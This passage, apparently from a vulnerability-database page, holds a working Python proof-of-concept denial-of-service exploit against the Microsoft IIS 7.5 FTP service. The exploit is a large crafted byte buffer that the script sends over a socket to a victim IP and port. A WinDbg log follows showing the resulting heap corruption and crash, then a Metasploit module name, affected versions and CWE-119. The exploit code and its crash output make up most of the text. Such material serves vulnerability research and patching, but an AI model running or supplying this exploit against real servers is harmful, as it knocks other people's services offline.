"\xff\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xef\xbb"
"\xbf\xff\xef\xfe\xff\xfe\xff\xff\xef\xfe\xff\xef\xbb\xbf\xff\xef"
"\xfe\xff\xef\xbb\xbf\xfe\xff\xff\xef\xff\xef\xfe\xff\xff\xef\xef"
"\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xfe\xff"
"\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xfe\xff"
"\xef\xbb\xbf\xef\xbb\xbf\xfe\xff\xff\xef\xff\xef\xfe\xff\xfe\xff"
"\xef\xbb\xbf\xfe\xff\xfe\xff\xfe\xff\xfe\xff\xfe\xff\xfe\xff\xff"
"\xef\xfe\xff\xff\xef\xff\xef\xff\xef\xff\xef\xfe\xff\xfe\xff\xef"
"\xbb\xbf\xff\xef\xff\xef\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xff\xef"
"\xfe\xff\xef\xbb\xbf\xff\xef\xfe\xff\xff\xef\xef\xbb\xbf\xff\xef"
"\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xfe\xff\xef\xbb\xbf\xef\xbb\xbf"
"\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xfe\xff\xff\xef\xef\xbb\xbf\xef"
"\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb"
"\xbf\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xfe"
"\xff\xfe\xff\xff\xef\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xfe\xff\xff"
"\xef\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xfe\xff\xef\xbb"
"\xbf\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xfe\xff\xef\xbb"
"\xbf\xfe\xff\xef\xbb\xbf\xff\xef\xfe\xff\xef\xbb\xbf\xff\xef\xff"
"\xef\xfe\xff\xfe\xff\xfe\xff\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xfe"
"\xff\xff\xef\xfe\xff\xfe\xff\xff\xef\xff\xef\xfe\xff\xff\xef\xff"
"\xef\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xfe\xff\xff\xef\xef\xbb"
"\xbf\xff\xef\xfe\xff\xff\xef\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xff"
"\xef\xef\xbb\xbf\xfe\xff\xff\xef\xff\xef\xff\xef\xff\xef\xff\xef"
"\xfe\xff\xef\xbb\xbf\xfe\xff\xff\xef\xff\xef\xff\xef\xfe\xff\xef"
"\xbb\xbf\xff\xef\xfe\xff\xfe\xff\xef\xbb\xbf\xff\xef\xfe\xff\xef"
"\xbb\xbf\xfe\xff\xff\xef\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xfe\xff"
"\xff\xef\xff\xef"
"\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xef\xbb\xbf"
"\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xfe\xff\xef"
"\xbb\xbf\xef\xbb\xbf\xfe\xff\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xff"
"\xef\xff\xef\xfe\xff\xff\xef\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xff"
"\xef\xff\xef\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb"
"\xbf\xff\xef\xff\xef\xfe\xff\xfe\xff\xfe\xff\xfe\xff\xff\xef\xfe"
"\xff\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xff\xef\xfe\xff"
"\xff\xef\xff\xef\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xff\xef"
"\xff\xef\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xef"
"\xbb\xbf\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xef"
"\xbb\xbf\xff\xef\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xfe"
"\xff\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xff\xef\xef\xbb"
"\xbf\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xfe\xff\xfe\xff\xfe\xff\xfe"
"\xff\xfe\xff\xff\xef\xff\xef\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xff"
"\xef\xef\xbb\xbf\xff\xef\xfe\xff\xef\xbb\xbf\xff\xef\xfe\xff\xff"
"\xef\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xfe\xff\xfe"
"\xff\xef\xbb\xbf\xfe\xff\xff\xef\xfe\xff\xef\xbb\xbf\xff\xef\xff"
"\xef\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xfe\xff\xff\xef\xff\xef\xff"
"\xef\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xff\xef\xff\xef"
"\xef\xbb\xbf\xfe\xff\xff\xef\xef\xbb\xbf\xfe\xff\xff\xef\xef\xbb"
"\xbf\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xff\xef\xfe\xff\xef\xbb\xbf"
"\xef\xbb\xbf\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xff\xef\xef\xbb\xbf"
"\xff\xef\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf\xef\xbb"
"\xbf\xfe\xff\xff\xef\xfe\xff\xef\xbb\xbf\xfe\xff\xff\xef\xff\xef"
"\xff\xef\xff\xef\xef\xbb\xbf\xfe\xff\xff\xef\xef\xbb\xbf\xff\xef"
"\xfe\xff\xef\xbb\xbf\xfe\xff\xef\xbb\xbf\xef\xbb\xbf\xef\xbb\xbf")


def usage():
        print "usage  : ./msiis7ftp.py <victim_ip>  <victim_port>"
        print "example: ./msiis7ftp.py 192.168.1.22 21"

def main(): 
	if len(sys.argv) != 3:
    		usage()
        	sys.exit()

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

	HOST = sys.argv[1]
	PORT = int(sys.argv[2])
	s.connect((HOST,PORT))
	data = s.recv(1024)
	print data
	print "[*] Sending Payload...\n"
	s.send(buf+'\r\n')
	print "[*] Closing Socket...\n"
	s.close()

if __name__ == "__main__":
    main()


------------------------------------------------------------------------------
ModLoad: 75500000 75516000   C:\Windows\system32\CRYPTSP.dll
ModLoad: 752a0000 752db000   C:\Windows\system32\rsaenh.dll
ModLoad: 72090000 720be000   C:\Windows\system32\mlang.dll
ModLoad: 75090000 7509b000   C:\Windows\system32\pcwum.DLL
ModLoad: 75a70000 75a7e000   C:\Windows\system32\RpcRtRemote.dll
(22c.c10): Break instruction exception - code 80000003 (first chance)
eax=7ffaf000 ebx=00000000 ecx=00000000 edx=779cd315 esi=00000000 edi=00000000
eip=77963574 esp=00ccfc38 ebp=00ccfc64 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll - 
ntdll!DbgBreakPoint:
77963574 cc              int     3
0:012> g
(22c.31c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0000003c ecx=0050291c edx=0000003b esi=005e5fc0 edi=00500000
eip=77986167 esp=00abf6b4 ebp=00abf794 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlPrefixUnicodeString+0x84c:
77986167 8b4814          mov     ecx,dword ptr [eax+14h] ds:0023:00000014=????????
0:006> g
(22c.31c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=005e5fc8 ebx=005e7fc8 ecx=b083ef27 edx=efb083ef esi=005e5fc0 edi=00500000
eip=77986030 esp=00abf674 ebp=00abf69c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlPrefixUnicodeString+0x715:
77986030 8b4904          mov     ecx,dword ptr [ecx+4] ds:0023:b083ef2b=????????
0:006> g
Critical error detected c0000374
(22c.31c): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=77950805 edx=00abe7a9 esi=00500000 edi=00515520
eip=779f28e5 esp=00abe9fc ebp=00abea74 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
ntdll!RtlpNtMakeTemporaryKey+0x1a49:
779f28e5 cc              int     3
0:006> g
(22c.31c): Unknown exception - code c0000374 (first chance)
(22c.31c): Unknown exception - code c0000374 (!!! second chance !!!)
eax=00abea0c ebx=00000000 ecx=77950805 edx=00abe7a9 esi=00500000 edi=00515520
eip=779f2913 esp=00abe9fc ebp=00abea74 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!RtlpNtMakeTemporaryKey+0x1a77:
779f2913 eb12            jmp     ntdll!RtlpNtMakeTemporaryKey+0x1a8b (779f2927)
0:006> g
WARNING: Continuing a non-continuable exception
(22c.31c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0050299c ecx=00000011 edx=0000003b esi=00000000 edi=00000000
eip=7798c64e esp=00abf8a4 ebp=00abf974 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlTimeFieldsToTime+0x1d7:
7798c64e 8b4714          mov     eax,dword ptr [edi+14h] ds:0023:00000014=????????
0:006> g
(22c.31c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0050299c ecx=00000011 edx=0000003b esi=00000000 edi=00000000
eip=7798c64e esp=00abf8a4 ebp=00abf974 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlTimeFieldsToTime+0x1d7:
7798c64e 8b4714          mov     eax,dword ptr [edi+14h] ds:0023:00000014=????????
0:006> g
(22c.31c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0050299c ecx=00000011 edx=0000003b esi=00000000 edi=00000000
eip=7798c64e esp=00abf8a4 ebp=00abf974 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlTimeFieldsToTime+0x1d7:
7798c64e 8b4714          mov     eax,dword ptr [edi+14h] ds:0023:00000014=????????
0:006> g
(22c.31c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0050299c ecx=00000011 edx=0000003b esi=00000000 edi=00000000
eip=7798c64e esp=00abf8a4 ebp=00abf974 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlTimeFieldsToTime+0x1d7:
7798c64e 8b4714          mov     eax,dword ptr [edi+14h] ds:0023:00000014=????????

Metasploit modules

auxiliary_dos/windows/ftp/iis75_ftpd_iac_bof rank 300
Microsoft IIS FTP Server Encoded Response Overflow Trigger
Source fetch failed: fetch_error โ€” view the original via the link above.

Application impact
VendorProductVersionsFixed
windows microsoftinternet_information_services7.5

References

CWEs

CWE-119

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.